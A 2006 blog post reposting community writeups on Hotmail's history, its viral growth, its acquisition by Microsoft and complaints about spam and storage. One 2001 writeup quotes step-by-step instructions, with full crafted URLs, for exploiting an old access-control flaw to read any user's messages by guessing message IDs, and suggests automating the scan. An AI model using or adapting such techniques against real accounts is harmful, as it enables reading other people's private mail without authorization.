Saturday, September 09, 2006

Hotmail history and crack attemps

What is below is a result of my being member in a support forum? The history of hotmail and many crack attempts and even many more I find interesting and at the same time boring, anyway who copy-pasted this to me did atleast something good.

I claim no authority and integrity- do I have to claim that? I don't think this is all against the Blogger.com TOC, if please let me know.

Hotmail
(thing) by DaVinciLe0 (5.9 mon) (print)    ?    Wed Mar 29 2000 at 13:01:23

Hotmail was originally named HoTMaiL, referring to the fact that it was
email on the web, in HTML. It was a good idea (though not the first) and
very successful. The company sold out to Microsoft a few years back, leaving
its employees in pretty favorable financial status. Nowadays it's best use
is as a patsy when filling in email fields on forms at sites you know will
spam you.

(thing) by giantfish (2.2 y) (print)    ?   1 C! Tue Feb 27 2001 at 2:05:38
Hotmail (Internet, software): A free Web-based e-mail service now owned by
Microsoft Corporation. A fine example of viral marketing. It grew its
subscriber base from zero to 12 million users in only 18 months - faster
than any other company in any industry in history, and with a budget of only
$50,000. It did so by including "P.S. I love you. Get your free email at
http://www.hotmail.com/" at the bottom of every email sent. Later it was
changed to be less endorsing by removing "P.S. I love you." Hotmail became
the largest e-mail provider countries like Sweden and India, without any
marketing there.

Today there are many Hotmail clones but it is still popular as a free e-mail
provider.

(thing) by jaggederest (4.8 y) (print)    ?   1 C! Mon Aug 20 2001 at
22:53:49


Has recently been broken/cracked. There's a very major backdoor exploit that
allows anyone with a hotmail account to read any message that has ever been
sent, even those which were deleted and emptied from the trash.
Here's the instructions, from a user on
http://www.slashdot.org, gol64738:


---= Three Steps To View Someones Emails In Hotmail (rev.2) =---
(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d1%26len%3d9999999999999999%26raw%3d0%
26login%3dusername%26domain%3dhotmail%2ecom&hm___f
l=attrd&domain=hotmail.com or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd
?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2
fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%
2e22%26start%3d1%26len%3d9999999999999999%26raw%3d
0%26login%3dusername%26domain%3dhotmail%2ecom&hm__
_fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped
code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 ,
MSG943322803%2e149

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead
of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail
frame on top.)

Note.You need to have both numbers correct and that username must have the
message to make this link work.

Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them
instead of true characters.

See here for full list:
http://www.december.com/html/spec/ascii.html

3. Done. If you entered correct message number & that user has it you will
see it. :)
(Test it with your own other hotmail account messages first to get the idea
working.)

---= ideas and comments for improved viewing / scan =---

Now typing those message numbers manually is too much work, you could create
a small utility to automatically scan given range of messages from specific
user name.
(You need to build it to work with IE, as you must be logged in hotmail when
you want to view messages..)

It also helps to know that from the message numbers, in you own hotmail
inbox,you can see about what time is what message number been used. eg:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you dont need to scan as many message addresses when you know from which
range you are looking at.

Test messages: (Login to hotmail,then use links to view message from my test
account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d
64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom
ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3
6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm
ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if its deleted! If you delete a message
in hotmail, and also empty trashcan, the message is still viewable using
this type of link.
Atleast for 6-12hrs or something.

---=.... Status / Feedback / Fixes / Questions .....---

Changes on the link:

Remove parameter:

%26disk%3d64%2e4%2e36%2e68_d1577
It caused Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. its not required.

Changed parameters:
%26start%3d9702%26len%3d9687
in to:
%26start%3d1%26len%3d9999999999999999
Thats is just the start & length to display, of the email. If you put too
small value for len it should display only up to that amount of
characters(?).

*
If the user doesnt have the message you will get error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."

*
Questions:
Q1. How do i get to know which message number the user has?

A1. You cannot. You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of messages just to see
something. (slow it is)

Q2. I've sended a test message to my another account but cannot see it?
And i can still see your test messages, but not my own?

A2. Check again that your MSG number is correct, both X and Y.
(MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (i havent seen bigger than 150)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try change the server, from "pv2fd.pav2.hotmail" to
"lw14fd.law14.hotmail" If you can see the test account messages then hotmail
hasnt been fixed yet.

Q3. The hobo scanner program doesnt work?
I get some "Path not found (76)" error?

A3. True in most cases.. :)
It has more bugs than microsoft products i guess.
Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
On Winnt it works but it doesnt save the scans..(bug in activating the
webwindow..)
Create the output directory yourself, that fixes the path error.
Q4. Where/How can i find this exploit link myself?

A4. 1. Go to your hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press ok to save settings.
5. View some email, you will see full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens new window with this exploitable link,
you can remove the some useless parameters from the
link and send this link to a friend for testing
if can see your message.

*
No any reply or confirmation from Hotmail so far.
The exploit still works. already almost 3 days since reported it to
Hotmail..(today is 20.08.2001)

Automated reply from hotmail security problem submission page did gave this
type of message..:p

"...Hotmail is a secure site and uses an intrusion alert that allows only
one IP
address to gain access to a mailbox at a time. If anyone tries to access
your
e-mail when your account is open, he or she is returned to the sign-in page.
Hotmail uses state-of-the-art software and firewall protection to offer our
members the highest security...."






(thing) by fondue (38.1 min) (print)    ?    Wed Jan 30 2002 at 22:49:06


HotMail is a seriously wack web mail service owned by Microsoft, and used by
them as bait to assimilate unwitting souls into the .NET Passport programme.
It has recently (in the last year or two) been rebranded MSN Hotmail and
decked out in livery stolen from Sun's Forte for Java development
environment. Hotmail is notoriously insecure, and has been cracked in
spectacular fashion at least once (see above writeups). A Hotmail account is
also a magnet for spam, some of it from Microsoft themselves (which you
can't block).
Hotmail subjects you to between one and five centre-page advertisments
before you can view your inbox, and after you perform any operation.
Microsoft also use Hotmail as a crutch for their demonstrably inferior IM
software, MSN Messenger, which is otherwise incapable of retaining offline
messages.

I personally use Netscape's WebMail instead of Hotmail, mainly because it's
less graphics-heavy, and doesn't print your password in plain text in its
redirect URL. (You mean you didn't notice that...?) Hotmail's terms of use
are pretty fucking hairy as well. It is probably a bad idea to correspond
with the Patent Office via Hotmail.


(thing) by SharQ (1.9 d) (print)    ?   3 C!s Tue Aug 27 2002 at 16:01:33


Hotmail - the internet "killer app" that went went down in flames


Why Hotmail became so popular

Hotmail was started as a free web-based e-mail service in 1996. It was not
the first, not the best, not the fastest, not the easiest to use and not the
most innovative service, but it quickly grew to become the biggest and most
popular nonetheless.

1996 was well before the internet boom, and only very few people had
internet access at home. However, libraries and universities had long
offered its users access through Arpanet and other networks, and when the
Internet seemed to be the new standard, it made sense to offer Internet to
the users as well.

If you are familiar with internet email standards, you know that the POP
standard pretty much requires you to store all your email on one particular
computer, because the mailbox otherwise fills up really fast. The problem
was - as mentioned - that not many people had their own computers hooked up
to the internet.

The Internet grew big because of two killer apps; The world wide web (which
most people, sadly, know as "the internet") and email. Later irc and other
chat services, along with Napster and other file sharing services became the
main killer apps, but email was always the key.

So - everybody wants an email address they can check at their local library,
at their universities and schools, or at the other locations offering free
(or at least cheap) internet access. Because most of these locations offered
the web rather than email, web email seemed like a fabulous idea.

So, several services started to offer free email. Among these were WhoWhere,
iName, Four11 and Hotmail. The common denominator of these services were
that they were free, offered reasonable privacy, and they were available
from any computer hooked up to the internet.

The Hotmail service was supported by advertising sales, and - quickly
afterwards - by offering free newsletters to their users. To deliver these
newsletters to the mailboxes, the service provider would take some money
from the newsletter, which in turn was supported by advertising.

Quickly, hundreds of websites wanting a piece of the cake spawned. Strictly
speaking, the technical level behind the email services is low - all you
need is a huge web server (or a server cluster, rather) with a front-end
(the nice-looking, user-friendly web page) and a secure database backend
(accessing the pop, imap or proprietary protocol mailboxes), and you were
good to go earn lots of money.

The reason why these types of email services were popular among advertisers
were that the users had to register. This means that you could get a fairly
exact picture of the demography of the users, thereby allowing for
specifically targeted marketing.

In short: The users were happy because they got free email, the provider was
happy because the advertisers gave them lots of money, and the advertisers
were happy because they finally got a wet dream coming true: They knew
exactly who watched their ads.

Things start going wrong

In 1998, Microsoft (who earlier had shrugged off the Internet as a waste of
time) was eager to get into the market, and decided to go for the biggest
provider there was - Hotmail. Per 1 st November 1998, Microsoft was
officially the owner of Hotmail and the 9 million (!) mailboxes that existed
on the Hotmail servers. The geek population was in distress.

Either because they were working on their strategy plans, or because
Microsoft just did not know what to actually do with Hotmail, they left it
alone for a while. Nothing changed, except for a small Microsoft logo
showing up every here and there.

Well.. Almost.

Almost at the same time that Microsoft took over Hotmail, reports (and
experiences) started showing up in the media of a dramatic increase in spam
to Hotmail accounts. I am not saying that these emails came from Microsoft,
but the rumours of Microsoft releasing email list - against good money, of
course - seem to make sense. At the same time, the service starts to "lose"
emails into nothingness - mail that is sent does not arrive, and mail that
is sent to a Hotmail mailbox vanishes into thin air. To my knowledge,
neither Hotmail nor Microsoft has ever made an official statement on this
phenomenon.

2002: Mo money, mo Hotmail.

In 2002, Hotmail has become MSN Hotmail, and has gotten a "nice" glossy
design which (surprise, surprise) matches Microsoft's Windows XP design. At
the same time, MSN announces that their POP service (the ability to get POP
mailbox messages to your Hotmail inbox for free) would be a pay-only
service. At the same time, Microsoft starts bombarding your message inbox
with - yes - spam. As it were, Hotmail has become a free web based email
with a limit of 2 MB per mailbox. If you want more storage space, you'll
have to pay, and Microsoft loves to remind you of this service.

Usually, if you only get text-only emails, this 2 MB limit is more than
enough. However, this is not the case when we talk about Hotmail, because of
the massive amounts of spam that come crashing into your mailbox. If a
mailbox is not cleaned out every 4-5 days or so, it will be "full", and you
will not get any emails - the mails are bounced back to the sender.

But - kind as they are - Microsoft also offers a solution to the problem:
Become a premium member! For only £19.99 per year, you can get the massive
storage space of 10 MB, along with the ability to check your POP email, to
prevent your account from expiring, virus scanning, and the possibility to
receive emails with attachments of 1.5 MB.

Considering that you for the same price could set up your own domain, with
about 10 mailboxes of 10 MB each, you do get the feeling that Microsoft is
ripping you off.

Add this to the hacking scandal (see an earlier node) and the fact that
Hotmail has become even more unreliable, the only conclusion must be that
Hotmail - despite having meant a lot to a lot of people - has lost its touch
rather severely.

Hotmail, Rest in Peace.

 

0 responses:

Post a Comment

Thanking you for your comment(s). Hope you will visit this blog again!

Subscribe to geeklog feed Bookmark and Share

Design by Free blogger template